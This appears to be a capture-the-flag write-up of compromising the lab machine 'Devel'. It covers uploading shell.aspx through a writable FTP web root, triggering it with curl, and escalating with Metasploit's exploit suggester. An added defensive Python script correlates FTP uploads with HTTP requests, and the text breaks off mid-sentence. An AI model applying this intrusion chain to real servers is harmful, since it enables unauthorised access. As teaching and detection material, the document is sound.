Summary:
Vulnerable software: MS IIS/7.5, FTP webroot exposed and writable
System vulnerable: 10.10.10.5
Vulnerability explanation:
Privilege escalation: kernel pool overflow in Win32k
Severity: critical
Enumeration:
Nmap shows that the Microsoft FTP server exposes the wwwroot folder, the same folder the web content is served from. This is dangerous if the server allows read and write access to that folder, because a file written over FTP can then be requested over HTTP and executed by IIS. It seems like it does in this case:
FileZilla showing the uploaded shell.aspx crafted by an attacker.
Once we trigger the uploaded shell, we get a connection back from the server:
curl -k http://10.10.10.5/shell.aspx
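On the defensive side, the sequence above (a script written over FTP, then requested over HTTP) can be detected by correlating the IIS FTP and HTTP logs. The following is an added example, not part of the original write-up; the log lines are constructed, and it assumes the FTP root and the web root are the same folder so that paths map one to one.

```python
from datetime import datetime, timedelta

# Constructed sample logs in W3C extended format (not taken from the target).
FTP_LOG = """\
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.50 - USER ftpuser 331
2024-01-01 10:00:05 192.0.2.50 ftpuser STOR /shell.aspx 226
2024-01-01 10:01:00 192.0.2.51 ftpuser STOR /logo.png 226
2024-01-01 10:02:00 192.0.2.52 ftpuser STOR /denied.aspx 550
"""
HTTP_LOG = """\
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2024-01-01 10:00:30 GET /shell.aspx 192.0.2.50 200
2024-01-01 10:01:30 GET /logo.png 192.0.2.51 200
2024-01-01 10:05:00 GET /iisstart.htm 192.0.2.60 200
"""
EXEC_EXT = (".aspx", ".asp", ".ashx", ".asmx")  # extensions IIS may execute

def parse_w3c(text):
    """Parse W3C log text into dicts keyed by the names in the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(
                row["date"] + " " + row["time"], "%Y-%m-%d %H:%M:%S")
            rows.append(row)
    return rows

def find_upload_then_request(ftp_text, http_text, window=timedelta(minutes=10)):
    """Return HTTP requests for executable files stored over FTP within `window`."""
    uploads = {}
    for r in parse_w3c(ftp_text):
        path = "/" + r["cs-uri-stem"].lower().lstrip("/")
        if r["cs-method"] == "STOR" and r["sc-status"] == "226" and path.endswith(EXEC_EXT):
            uploads[path] = r  # only completed transfers (226) of script files
    hits = []
    for r in parse_w3c(http_text):
        up = uploads.get(r["cs-uri-stem"].lower())
        if up and timedelta(0) <= r["ts"] - up["ts"] <= window:
            hits.append({"path": r["cs-uri-stem"], "ftp_user": up["cs-username"],
                         "ftp_ip": up["c-ip"], "http_ip": r["c-ip"],
                         "delay_s": int((r["ts"] - up["ts"]).total_seconds())})
    return hits

if __name__ == "__main__":
    for hit in find_upload_then_request(FTP_LOG, HTTP_LOG):
        print(hit)
```

The durable fix is to remove write access to the web root from the FTP site, or to point the FTP site at a directory that IIS does not serve.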
Next we run local_exploit_suggester to find possible kernel privilege escalation methods on this Windows 7 Box.
meterpreter > sysinfo
Computer : DEVEL
OS : Windows 7 (Build 7600).
Architecture : x86
System Language : el_GR
Domain : HTB
Logged On Users : 0
Meterpreter : x86/windows
The Metasploit exploit_suggester came up with a few exploits matching the architecture of the victim:
Metasploit local enumeration
Because the system was unpatched, many of the above suggestions executed successfully on the target, giving a potential attacker an NT_AUTHORITY-level account: